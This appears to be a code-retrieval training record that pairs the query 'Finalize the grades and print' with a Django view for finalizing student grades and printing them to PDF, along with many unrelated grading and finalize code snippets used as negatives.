[ "0.6545719", "0.64571476", "0.6421992", "0.6398177", "0.6392814", "0.632745", "0.62147915", "0.6207807", "0.6147925", "0.61356354", "0.6131394", "0.612939", "0.61182773", "0.61020154", "0.6070016", "0.60693353", "0.605311", "0.6039241", "0.6023937", "0.60228825", "0.60228825", "0.5984762", "0.5980634", "0.59621537", "0.5956924", "0.59464365", "0.5941148", "0.5929363", "0.59024227", "0.5896444", "0.5894538", "0.58846885", "0.5883799", "0.58806276", "0.58700705", "0.5853246", "0.58471316", "0.5842201", "0.5840097", "0.5839575", "0.5814553", "0.58054835", "0.5803139", "0.580106", "0.5798838", "0.5792221", "0.5785201", "0.57833445", "0.5783336", "0.5782162", "0.5778324", "0.5778128", "0.57750714", "0.5773201", "0.5771534", "0.5766515", "0.5757946", "0.57347137", "0.57304966", "0.5717516", "0.5715068", "0.57082266", "0.5652748", "0.5650997", "0.5650997", "0.5650562", "0.5646426", "0.5634208", "0.5632559", "0.56318194", "0.56304055", "0.56296164", "0.5619609", "0.5613354", "0.5610097", "0.5603533", "0.559168", "0.558647", "0.55819565", "0.558118", "0.5576473", "0.5573608", "0.5568475", "0.5565287", "0.55640024", "0.55565417", "0.5556491", "0.55280614", "0.5527152", "0.5526561", "0.55226725", "0.5521137", "0.55144095", "0.5513783", "0.5505715", "0.55014443", "0.55009955", "0.55005527", "0.5492239", "0.54915875", "0.54875904" ]
0.0
-1
Finalize the grades and print. Only for assessors.
def finalize(request, pk, version=0):
    ts = get_timeslot()
    if not hasattr(ts, 'resultoptions'):
        raise PermissionDenied("Results menu is not yet visible.")
    else:
        if not get_timeslot().resultoptions.Visible:
            raise PermissionDenied("Results menu is not yet visible.")
    dstr = get_object_or_404(Distribution, pk=pk)
    if not hasattr(dstr, 'presentationtimeslot'):
        raise PermissionDenied('This student does not have a presentation planned. Please plan it first.')
    if not request.user.is_superuser and \
            request.user not in dstr.presentationtimeslot.Presentations.Assessors.all() and \
            request.user != dstr.Proposal.Track.Head:
        raise PermissionDenied("You are not the correct owner of this distribution. "
                               " Grades can only be finalized by assessors or track heads. "
                               " To get a preview of the print view, use the 'Print Preview' button.")
    version = int(version)
    # check if grade is valid
    error_list = ''
    for cat in GradeCategory.objects.filter(TimeSlot=get_timeslot()):
        try:
            cat_res = cat.results.get(Distribution=dstr)
            if not cat_res.is_valid():
                error_list += ('<li>Category {} is not completed.</li>'.format(cat))
        except CategoryResult.DoesNotExist:
            error_list += ('<li>Category {} is missing</li>'.format(cat))
    if error_list:
        return render(request, "base.html", context={
            'Message': '<h1>The results of this student are not yet finished</h1><p>The following error(s) occurred:</p><ul>{}</ul>'.format(error_list),
            "return": "results:gradeformstaff",
            "returnget": str(pk),
        })
    if version == 0:  # The normal page summarizing the grades of the student
        return render(request, "results/finalize_grades.html", {
            "dstr": dstr,
            "catresults": dstr.results.all(),
            "final": all(f.Final is True for f in dstr.results.all()),
            "finalgrade": dstr.TotalGradeRounded(),
            "preview": False,
        })
    else:  # type 1 and 2, finalize grades.
        if get_timephase_number() != 7:
            raise PermissionDenied("Finalize grades is only possible in the time phase 'Presentation of results'")
        for cat in dstr.results.all():
            # set final to True, disable editing from here onward.
            cat.Final = True
            cat.save()
        if version == 1:  # printable page with grades
            return render(request, "results/print_grades_pdf.html", {
                "dstr": dstr,
                "catresults": dstr.results.all(),
                "finalgrade": dstr.TotalGradeRounded(),
            })
        elif version == 2:  # pdf with grades
            html = get_template('results/print_grades_pdf.html').render({
                "dstr": dstr,
                "catresults": dstr.results.all(),
                "finalgrade": dstr.TotalGradeRounded(),
            })
            buffer = BytesIO()
            pisa_status = pisa.CreatePDF(html.encode('utf-8'), dest=buffer, encoding='utf-8')
            if pisa_status.err:
                raise Exception("Pisa Failed PDF creation in print final grade for distribution {}.".format(dstr))
            buffer.seek(0)
            response = HttpResponse(buffer, 'application/pdf')
            response['Content-Disposition'] = 'attachment; filename="bepresult_{}.pdf"'.format(dstr.Student.usermeta.get_nice_name())
            return response
        raise PermissionDenied('Invalid type.')
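The only non-Django dependency in the view is the version == 2 branch, which turns a rendered HTML template into a PDF attachment with xhtml2pdf. Below is a standalone sketch of just that step, assuming xhtml2pdf and Django are installed; the helper name render_pdf_attachment and its arguments are hypothetical, not part of the original.

from io import BytesIO
from django.http import HttpResponse
from xhtml2pdf import pisa

def render_pdf_attachment(html, filename):
    # Convert an HTML string to PDF bytes in memory, mirroring the
    # version == 2 branch of the view above.
    buffer = BytesIO()
    status = pisa.CreatePDF(html.encode('utf-8'), dest=buffer, encoding='utf-8')
    if status.err:
        raise RuntimeError('PDF generation failed')
    buffer.seek(0)
    response = HttpResponse(buffer, 'application/pdf')
    response['Content-Disposition'] = 'attachment; filename="{}"'.format(filename)
    return response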
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main():\n\n students = [\"Chris\", \"Jesse\", \"Sally\"]\n grades = [90, 80, 70]\n print_gradebook(students, grades)", "def finalize():\n\n print(\"\"\"\n The script analysis/sedov_compare.py can be used to analyze these\n results. That will perform an average at constant radius and\n compare the radial profiles to the exact solution. Sample exact\n data is provided as analysis/cylindrical-sedov.out\n \"\"\")", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def finalize(self):\n\t\tif self._sum_factor != 0.0:\n\t\t\tself._last_score = self._current_score / self._sum_factor\n\t\telse:\n\t\t\tself._last_score = 0.0\n\n\t\tself._scores.append(self._last_score)\n\t\tself._scores = self._scores[-self._range[1]:]\n\t\n\t\tself._sum_factor = 0.0\n\t\tself._current_score = 0.0", "def finalize(self):\n logger.debug(\"Generation Complete\")\n self.events.generation_complete()", "def finalize(self):\n print('Cleaning up...')", "def print_scores(self):\n ### FILL IN ###", "def finalize():\n global interpreter\n del interpreter\n blotish._cleanup()\n\n # Set the progress printing state to whatever it was before\n import paraview.servermanager\n global wasProgressPrinting\n paraview.servermanager.SetProgressPrintingEnabled(wasProgressPrinting)", "def print_grades(grades, grader_name):\n grades = sorted(grades,\n key=lambda grade: grade.student_name())\n # Length of longest name\n max_name_len = max(len(grade.student_name()) for grade in grades)\n\n grade_report = '\\n'.join(\n '{:<{max_name_len}}\\t{}\\t{}'.format(\n grade.student_name(),\n grade.score() if grade.graded() else '(ungraded)',\n grade.breakdown(grader_name) if grade.graded() else '',\n max_name_len=max_name_len)\n for grade in grades)\n click.echo_via_pager('grade report:\\n\\n' + grade_report)", "def print_allocations(self, ):\n pass", "def finalize(self):\r\n\r\n self.find_parents()\r\n self.order_vertices()\r\n self.set_rotation_matrices()", "def finalize(self):\n self.clear()\n sys.stderr.write(f\"{self._message} finished after {(time.time()-self._startTime):.1f}s \"\n \"at \"+time.strftime(\"%H:%M:%S\", time.localtime())+\" \\n\")", "def finalize(self):\n sys.stderr.write(f\"{self._message} finished after {(time.time()-self._startTime):.1f}s \"\n \"at \"+time.strftime(\"%H:%M:%S\", time.localtime())+\" \\n\")", "def finalize(self):\n sys.stderr.write(f\"{self._message} finished after {(time.time()-self._startTime):.1f}s \"\n \"at \"+time.strftime(\"%H:%M:%S\", time.localtime())+\" \\n\")", "def finalize(self):\n pass", "def finalize(self):\n pass", "def finalize(self):\n pass", "def finalize(self):\n pass", "def finalize(self):\n pass", "def finalize(self):\n pass", "def test_a_grade(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.submit_question_answer('p2', {'2_1': 'Correct'})\r\n self.submit_question_answer('p3', {'2_1': 'Correct'})\r\n self.check_grade_percent(1.0)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'A')", "def finalize_scores(self):\n if self.candidates_finalized:\n return\n self.candidates_finalized = True\n for cand in self.candidates:\n new_logp_blank = cand.logp_total()\n last_word = cand.text_state.last_word\n if self.lm is not None and last_word != '':\n # Merging cands with texts differing only in the final sep was not done in the reference.\n new_lm_state = kenlm.State()\n logp_lm_last_word = 
self.lm.BaseScore(cand.lm_state, last_word, new_lm_state) * self.log10_to_ln\n cand.lm_state = new_lm_state\n if self.oov_score is not None and last_word not in self.lm:\n logp_lm_last_word = self.oov_score\n new_logp_blank += self.alpha * logp_lm_last_word + self.beta\n cand.logp_blank = new_logp_blank\n cand.logp_non_blank = -np.inf\n cand.new_logp_blank = None\n cand.new_logp_non_blank = None", "def print_results(self) -> None:\n print(\"=\" * 70, file=sys.stderr)\n total = 0.0\n max_points = 0.0\n for problem in self.problems:\n total += problem.run_tests()\n max_points += problem.max_grade\n print(f\"Total Grade: {total}/{max_points}\", file=sys.stderr)", "def finalize(self):\r\n pass", "def finalize(self):\n print(\"%d default sprite names found:\" % self.total_default)\n for name in self.list_default:\n print name", "def print_students_gpa(std):\n print (\"Student Id:\", get_id(std))\n print (\"Student name:\", get_fname(get_name(std)), get_lname(get_name(std)))\n print (\"GPA: %.2f\" %(calc_gpa(std)))", "def finalize(self):\n print(\"%d default backgdrop names found\" % self.total_default)\n for name in self.list_default:\n print name", "def finalize(self):\n return", "def finalize():\n pass", "def finalize():\n pass", "def finalize():", "def finalize():", "def finalize():", "def onFinish(self):\n self.finalizeStats()", "def finalize(self) -> None:\n pass", "def finish(self):\n if self.failed:\n print \"%s failed. %s of %s assertions passed.\" % (\n self.failed, self.passed, self.failed + self.passed)\n else:\n print \"%s of %s assertions passed.\" % (self.passed, self.passed)\n\n self.failed = self.passed = 0", "def final_report(self):\n print('Final Count for', self.reason, self.successes, 'of', self.tests, 'tests passed')", "def __exit__(self, *args):\n if self.silent:\n return\n\n # Print the final timer status\n color = self.final_color if self.deactivate else self.active_color\n\n if self.i > 1 or self.count is not None:\n num_iters = self.i if self.i > 0 else self.count\n\n # Display average time elapsed per instance\n self.display(\"[{0:.2g}s on avg]\".format(\n (time.time() - self.start) / num_iters),\n message=self.last_message,\n msg_color=color,\n timing_color=color,\n )\n else:\n # Display total time elapsed\n self.display(\"[{0:.2g}s]\".format(\n time.time() - self.start),\n message=self.last_message,\n msg_color=color,\n timing_color=color,\n )\n\n # Prevent the final timing string from being overwritten\n if self.newline:\n print(file=self.stream)", "def show_grades(state, from_dir):\n grading_manager = GradingManager(state.get_assignment(), from_dir)\n print_grades(grading_manager.grades(), state.user_name)", "def finalize(self):\n self.classifier.finalize()", "def print_grades(grades_input):\n for grade in grades_input:\n print grade", "def finalize_preview(request, pk, step=0):\n ts = get_timeslot()\n if not hasattr(ts, 'resultoptions'):\n raise PermissionDenied(\"Results menu is not yet visible.\")\n else:\n if not get_timeslot().resultoptions.Visible:\n raise PermissionDenied(\"Results menu is not yet visible.\")\n dstr = get_object_or_404(Distribution, pk=pk)\n if not hasattr(dstr, 'presentationtimeslot'):\n raise PermissionDenied('This student does not have a presentation planned. 
Please plan it first.')\n\n if not request.user.is_superuser and \\\n request.user != dstr.Proposal.Track.Head and \\\n request.user != dstr.Proposal.ResponsibleStaff and \\\n get_grouptype('3') not in request.user.groups.all() and \\\n request.user not in dstr.presentationtimeslot.Presentations.Assessors.all():\n raise PermissionDenied(\"You do not have the correct permissions to view print preview.\")\n return render(request, \"results/finalize_grades.html\", {\n \"dstr\": dstr,\n \"catresults\": dstr.results.all(),\n \"final\": all(f.Final is True for f in dstr.results.all()) if dstr.results.all() else False,\n \"finalgrade\": dstr.TotalGradeRounded(),\n \"preview\": True,\n })", "def finalize(self):", "def finalize(self):", "def finalize(self):\n if not hasattr(self, 'finish'):\n self.logger.warning('Class does not have a finalize statement')", "def agent_cleanup(self):\n\n logging.info(\"Best score: %s\" % self.best_score_ever)\n\n if self.results_file:\n self.results_file.close()", "def finalize(self):\n self._iou_ap.compute_ap_curve()\n self._pixel_ap.compute_ap_curve()\n self._azimuth_ap.compute_ap_curve()\n self._polar_ap.compute_ap_curve()", "def finalize(self): # real signature unknown; restored from __doc__\n pass", "def finalize(self):\n\t\tself.logger.info(\"Please wait while finalizing the operation.. Thank you\")\n\t\tself.save_checkpoint()\n\t\tself.summary_writer.export_scalars_to_json(\"{}all_scalars.json\".format(self.config.summary_dir))\n\t\tself.summary_writer.close()\n\t\tself.data_loader.finalize()\n\t\tif self.config.output_model == True:\n\t\t\ttry:\n\t\t\t\tself.logger.info('Saving model for external usage.')\n\t\t\t\tself.load_checkpoint('model_best.pth.tar')\n\t\t\t\ttraced = torch.jit.trace(self.model,self.data_loader.train_loader.dataset[:2][0].float().to(self.device))\n\t\t\t\ttraced.save(self.config.output_model_path)\n\t\t\texcept IOError:\n\t\t\t\tself.logger.info('Output model path not found.')", "def print_stats(self):\n # Determine assignments with the maximum profit\n max_assignments = [a for a,p in self.finished_assignments.items()\n if p == self.max_profit]\n \n # Print general stats\n print('\\nTotal number of assignments: {}'.format(len(self.finished_assignments)))\n if self.fair:\n print('Maximum fair profit: {}'.format(self.max_profit))\n print('Number of max fair profit assignments: {}\\n'.format(len(max_assignments)))\n else:\n print('Maximum profit: {}'.format(self.max_profit))\n print('Number of max profit assignments: {}\\n'.format(len(max_assignments)))\n \n # Pretty print a single max assignment\n if max_assignments:\n print('Example of a maximum profit assignment:')\n for a, t in sorted((a,sorted(t)) for a, t in max_assignments[0].items()):\n print('Agent: {}\\tTasks: {}'.format(a, ', '.join(t)))", "def finalize(self):\n self.ratings.close()\n self.users.close()\n self.movies.close()", "def test_dropping_grades_normally(self):\r\n self.dropping_setup()\r\n self.dropping_homework_stage1()\r\n\r\n self.assertEqual(self.score_for_hw('homework1'), [1.0, 0.0])\r\n self.assertEqual(self.score_for_hw('homework2'), [1.0, 1.0])\r\n self.assertEqual(self.earned_hw_scores(), [1.0, 2.0, 0]) # Order matters\r\n self.check_grade_percent(0.75)", "def do_finalize(self):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tdef _finalize(self):\n\t\t\t# Stop all the modules\n\t\t\tself.stop_all()\n\t\t\t# Finalize in reverse order\n\t\t\tself.log('PHASE: finalizing object ' + str(self), level=logging.DEBUG)\n\t\t\t# Login at least once to get the 
exports.\n\t\t\tfor module_id in self.module_ids(rev=True):\n\t\t\t\t# Only finalize if it's thought to be installed.\n\t\t\t\tif self.is_installed(self.shutit_map[module_id]):\n\t\t\t\t\tself.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\t\tif not self.shutit_map[module_id].finalize(self):\n\t\t\t\t\t\tself.fail(module_id + ' failed on finalize', shutit_pexpect_child=self.get_shutit_pexpect_session_from_id('target_child').pexpect_child) # pragma: no cover\n\t\t\t\t\tself.logout(echo=False)\n\t\t_finalize(self)", "def testDriver():\n exam1=90\n exam2=85\n assignmentScores = [50, 60, 70, 80, ]\n computeGrades(exam1, exam2, assignmentScores)", "def dump_grading_context(course):\r\n hbar = \"{}\\n\".format(\"-\" * 77)\r\n msg = hbar\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\"\\\r\n % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += hbar\r\n msg += \"Listing grading context for course %s\\n\" % course.id.to_deprecated_string()\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsomething, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsomething)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n frmat = getattr(sdesc, 'format', None)\r\n aname = ''\r\n if frmat in graders:\r\n gform = graders[frmat]\r\n aname = '%s %02d' % (gform.short_label, gform.index)\r\n gform.index += 1\r\n elif sdesc.display_name in graders:\r\n gform = graders[sdesc.display_name]\r\n aname = '%s' % gform.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (format=%s, Assignment=%s%s)\\n\"\\\r\n % (sdesc.display_name, frmat, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def finalize() -> None:\n collective.finalize()", "def Finalize():\n pass", "def finalize(self):\r\n self.outfile_param.close()\r\n self.outfile_sim.close()", "def __statistics_disciplines_graded(self):\n disciplines_list = self.__grade_controller.get_list_of_graded_disciplines()\n if len(disciplines_list) == 0:\n print(\"There is no graded discipline!\")\n return\n\n for discipline in disciplines_list:\n print(str(discipline) + \"\\n\")", "def publish_grade(self):\r\n score = self.lcp.get_score()\r\n self.runtime.publish(\r\n self,\r\n 'grade',\r\n {\r\n 'value': score['score'],\r\n 'max_value': score['total'],\r\n }\r\n )\r\n\r\n return {'grade': score['score'], 'max_grade': score['total']}", "def finalize(self):\n \n if self.outpath:\n # User specified an file path to which to write\n # the Group Scheduling Events, Attempt to open\n # specified file for writing.\n #\n try:\n outstream = open(self.outpath, 'w')\n except IOError, eargs:\n # Nope, it isn't writable due to an IOError. 
\n # Let them know the error and warn them that\n # the default action is to fallback to stdout\n # as an output stream if the output they \n # specify fails to initialize.\n #\n print 'Error: CCSMFilter.finalize : %s' % eargs\n print 'Warning: Falling back to output stream sys.stdout'\n outstream = sys.stdout\n else:\n outstream = sys.stdout\n \n # Print all the events to the output stream.\n # \n for ccsm_event in self.ccsm_events:\n print >> outstream, ccsm_event\n \n # Check to see if the pointer to \n # stdout is the same as the pointer\n # to our outstream.\n #\n if outstream != sys.stdout:\n # It isn't so close the file. \n # If our outstream was stdout you probably wouldn't\n # want to close it.\n #\n outstream.close()", "def finalize(self):\n self.logger.debug(\"Finalizing...\")\n self.listeners = []\n self.finalizing = True", "def finalize(self):\n import pickle\n logger.info('*** crash task summary:')\n logger.info('*** N: %d',self.N)\n logger.info('*** done_counter: %d',self.done_counter)\n logger.info('*** completed_counter: %d',self.completed_counter)\n logger.info('*** ignored_counter: %d',self.ignored_counter)\n pickle.dump(self,file('crash.pp','w'))", "def print_output(filtered_courses_list):\n\n if not filtered_courses_list:\n print(\"No courses matched the query.\")\n return\n\n max_name_length = max([len(course.name) for course in filtered_courses_list])\n\n print(\" Sem | Course ID | Pts | \" +\n \" \" * ((max_name_length - 11) // 2 + (max_name_length - 1) % 2) + \"Course Name\" + \" \" * ((max_name_length - 11) // 2) +\n \" | Grade\")\n print(\"______|___________|_____|\" + \"_\" * (max_name_length + 2) + \"|______\")\n\n for course in filtered_courses_list:\n print(str(course.year) + course.semester, end=\" | \")\n print(course.cid, end=\" | \")\n print(course.creditpts, end=\" | \")\n print(course.name, end=\" \" * (max_name_length - len(course.name) + 1) + \"| \")\n\n print(course.grade)\n\n print(\"\\nGPA: \" + (\"%.3f\" % calculate_weighted_average(filtered_courses_list)))", "def _Finalize(self):\n logging.debug(\"Sumparts = %s\", self.sumparts)\n if self.sumparts:\n # Because some files may have corresponded to subtracks of a single logical\n # track, it's possible that the number of items in ``self.tracks`` is greater\n # than the actual number of tracks, so the correct thing to do is take\n # the largest track number\n logging.debug(\"Summing parts\")\n self[\"TOTAL_PARTS\"] = str(max(int(x[\"track\"]) for x in self.tracks))\n elif \"TOTAL_PARTS\" in self:\n logging.debug(\"Deleting 'TOTAL_PARTS'\")\n del self[\"TOTAL_PARTS\"]\n else:\n logging.debug(\"Not summing parts and 'TOTAL_PARTS' doesn't exist\")\n if len(self[\"DATE_RECORDED\"]) != 4:\n logging.debug(\"Improper date found %s\", self[\"DATE_RECORDED\"])\n year = re.split(\"-|/|\\.\", self[\"DATE_RECORDED\"])\n for y in year:\n if len(y) == 4:\n logging.debug(\"Found year %s\", y)\n self[\"DATE_RECORDED\"] = y\n break\n else:\n raise RuntimeError(f\"Can't parse date {self['DATE_RECORDED']}\")\n if any('phase' in t for t in self.tracks) and 'PHASE_NAME' not in self.data:\n self.data['PHASE_NAME'] = 'Phase'", "def finalize(self):\n # Set the title and axis labels\n self.set_title(\"Cook's Distance Outlier Detection\")\n self.ax.set_xlabel(\"instance index\")\n self.ax.set_ylabel(\"influence (I)\")\n\n # Only add the legend if the influence threshold has been plotted\n if self.draw_threshold:\n self.ax.legend(loc=\"best\", frameon=True)", "def show_all(self):\n self.explained_variance_score()\n 
self.max_error()\n self.mean_absolute_error()\n self.mean_squared_error()\n self.median_absolute_error()\n self.r2_score()\n self.mean_poisson_deviance()\n self.mean_gamma_deviance()\n self.feature_importance()\n self.learning_curve()", "def dump_grading_context(course):\r\n msg = \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\" % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Listing grading context for course %s\\n\" % course.id\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsections, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsections)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n grade_format = getattr(sdesc, 'grade_format', None)\r\n aname = ''\r\n if grade_format in graders:\r\n gfmt = graders[grade_format]\r\n aname = '%s %02d' % (gfmt.short_label, gfmt.index)\r\n gfmt.index += 1\r\n elif sdesc.display_name in graders:\r\n gfmt = graders[sdesc.display_name]\r\n aname = '%s' % gfmt.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (grade_format=%s, Assignment=%s%s)\\n\" % (s.display_name, grade_format, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def finalize(self) -> None:\n # Finalize function of bmi class of lisflood is kaput, so not calling it\n del self._bmi", "def finalize(self):\n self.report('Finalizing optimization procedure.')\n with self.optimizer() as opt:\n optimal_process_output = opt.result_value\n optimal_process_output.store()\n self.out('optimal_process_output', optimal_process_output)\n result_index = opt.result_index\n optimal_process = self.ctx[self.eval_key(result_index)]\n self.out('optimal_process_uuid', Str(optimal_process.uuid).store())", "def finalize(self):\n # 027 Filling-in of the total_count column.\n self.logger.debug(\"Finalizing the bow table. 
Counting the total_count column.\")\n # 027 Find how many lines are in bow table.\n bowLinesCount=self.getTableLinesCount(\"BOW\",\"bow_id\")\n # 027 Now count and update the line sumation for each line.\n for cx in range(bowLinesCount): self.sumBowLine(cx+1)\n self.DBconnection.commit()", "def mark_as_done(self):\n grade_event = {'value': self.points, 'max_value': self.points}\n self.runtime.publish(self, 'grade', grade_event)", "def print_scores(self):\n print(\"scores: \", self.get_scores())", "def finalize(self):\n if self.logging:\n self.train_writer.close()", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def stats(self):\n\t\t\n\t\tx = [self.authorities[i] for i in self.authorities if self.authorities[i] != 1]\n\t\txx = sorted(x)\n\t\tl = float(len(xx))\n\t\tprint \"-----------\"\n\t\tprint \"Population : \" + str(l)\n\t\tprint \"-----------\"\n\t\tprint \"Q1 = \" + str(xx[int(l/4)])\n\t\tprint \"Q3 = \" + str(xx[int(float(l/4)*3)])\n\t\tprint \"-----------\"\n\t\tprint \"01/08 = \" + str(xx[int(l/8)])\n\t\tprint \"07/08 = \" + str(xx[int(float(l/8)*7)])\n\t\tprint \"-----------\"\n\t\tprint \"01/16 = \" + str(xx[int(l/16)])\n\t\tprint \"15/16 = \" + str(xx[int(float(l/16)*15)])\n\t\tprint \"-----------\"\n\t\tprint \"01/32 = \" + str(xx[int(l/32)])\n\t\tprint \"31/32 = \" + str(xx[int(float(l/32)*31)])\n\t\tprint \"-----------\"\n\t\tprint \"01/64 = \" + str(xx[int(l/64)])\n\t\tprint \"63/64 = \" + str(xx[int(float(l/64)*63)])\n\t\tprint \"-----------\"\n\t\tprint \"01/128 = \" + str(xx[int(l/128)])\n\t\tprint \"127/128 = \" + str(xx[int(float(l/128)*127)])\n\t\tprint \"-----------\"\n\t\tprint \"01/256 = \" + str(xx[int(l/256)])\n\t\tprint \"255/256 = \" + str(xx[int(float(l/256)*255)])\n\t\tprint \"-----------\"\n\t\tprint \"01/512 = \" + str(xx[int(l/512)])\n\t\tprint \"511/512 = \" + str(xx[int(float(l/512)*511)])\n\t\tprint \"-----------\"", "def computeGrades(e1, e2, a):\n \n a = assignmentScores\n a.sort()\n i=0\n while i<10:\n sum+=sum a[i]\n avg = sum/10\n \n grade = ((e1 + e2) /2) * 0.4 + (avg) * 0.6\n \n return grade\n \n if grade >= 90 and grade <= 100:\n return(\"A\")\n \n elif grade >= 80 and grade < 90:\n return(\"B\")\n \n elif grade >= 70 and grade < 80:\n return(\"C\")\n \n elif grade >= 60 and grade < 70:\n return(\"D\")\n \n elif grade < 60:\n return(\"F\")", "def finalize():\n global interpreter\n interpreter = None\n global doProgressToggle\n if doProgressToggle: paraview.servermanager.ToggleProgressPrinting()", "def finalize_submission(self, submission_dir):\n raise NotImplementedError", "def finalize(self):\n self.isOver = True\n self.currentIteration = -1", "def clean_up(self) -> None:\n print('Doing some clean-up work...')", "def GradeManager():\r\n quit_program = False\r\n while quit_program is False:\r\n user_input = input('$ ')\r\n n = user_input.find(' ') # separates argument and command\r\n if user_input[:n] == 'AddStudent':\r\n add_student(user_input[n + 1:])\r\n elif user_input[:n] == 'DeleteStudent':\r\n delete_student(user_input[n+1:])\r\n elif user_input[:n] == 'SortRoster':\r\n sort_roster(user_input[n+1:])\r\n elif user_input[:n] == 'FindByFName':\r\n find_by_name('FindByFName', user_input[n+1:])\r\n elif user_input[:n] == 'FindByLName':\r\n find_by_name('FindByLName', user_input[n+1:])\r\n elif user_input[:n] == 'GetAverage':\r\n get_average(user_input[n+1:])\r\n elif user_input == 'PrintRoster':\r\n for student in StudentRoster:\r\n print(student_format(student))\r\n elif 
user_input == 'Quit': # test\r\n quit_program = True", "def finalize_statistics_collection(self):\n # Close all files.\n self.testing_batch_stats_file.close()\n self.testing_set_stats_file.close()", "def gradeReport(course):\n report = []\n for student in course.allStudents():\n total = 0.0\n numberOfGrades = 0\n for grade in course.getGrades(student):\n total += grade\n numberOfGrades += 1\n \n try:\n average = total / numberOfGrades\n report.append(str(student) + \"'s mean grade is \" + str(average))\n except ZeroDivisionError:\n report.append(str(student) + \" has no grades\")\n \n return '\\n'.join(report)", "def test_none_grade(self):\r\n self.basic_setup()\r\n self.check_grade_percent(0)\r\n self.assertEqual(self.get_grade_summary()['grade'], None)", "def grade_report(course):\n report = []\n for st in course.get_students():\n try:\n average = sum(course.get_grades(st)) / len(course.get_grades(st))\n report.append(str(st) + '\\'s mean grade is: ' + str(average) + '.')\n except ZeroDivisionError:\n report.append(str(st) + ' has no grades.')\n return '\\n'.join(report)", "def finalize(self, **kwargs: Any) -> None:\n pass", "def perform_final_actions(self):\n for finalizer_function in self._finalizer_functions:\n finalizer_function()", "def finalize(self):\n\n if self.finalized:\n return\n\n # Instantiate radial cells\n for pin in self.pincells:\n if isinstance(pin, InfinitePinCell) and not pin.finalized:\n pin.finalize()\n \n # Instantiate the axial cells\n for i, (pin, plane) in enumerate(zip(self.pincells, self.axials)):\n\n label = \"{0} axial {1}: {2}\".format(self.name, i, pin.name)\n cell = openmc.Cell(name=label, fill=pin)\n\n if i == 0:\n # Bottom section\n cell.region = -plane\n\n else:\n # Middle section\n cell.region = -plane & +self.axials[i-1]\n\n self.add_cell(cell)\n\n # Top section\n label = \"{0} axial top: {1}\".format(self.name, self.pincells[-1].name)\n cell = openmc.Cell(name=label, fill=self.pincells[-1])\n cell.region = +self.axials[-1]\n \n self.add_cell(cell)\n \n self.finalized = True", "def disp_score():", "def finish(self):\n distinct_users = set(self.users)\n\n output = []\n f_measures = []\n for user in distinct_users:\n output.append(user)\n tp, tn, fp, fn = 0.0, 0.0, 0.0, 0.0\n for reported, present, event_user in zip(self.alarms, self.anomalies, self.users):\n if event_user != user:\n continue\n if present and reported:\n tp += 1\n elif not present and not reported:\n tn += 1\n elif not present and reported:\n fp += 1\n elif present and not reported:\n fn += 1\n output.append('True positive: %i' % tp)\n output.append('True negative: %i' % tn)\n output.append('False positive: %i' % fp)\n output.append('False negative: %i' % fn)\n if tp == 0:\n f_measure = 0\n else:\n f_measure = 2.0 * tp / (2 * tp + fn + fp)\n f_measures.append(f_measure)\n output.append('F-measure: %0.4f' % f_measure)\n output.append('-------------------------------------')\n avg_f_measure = 1.0 * sum(f_measures) / len(f_measures)\n output.append('Score (avg. 
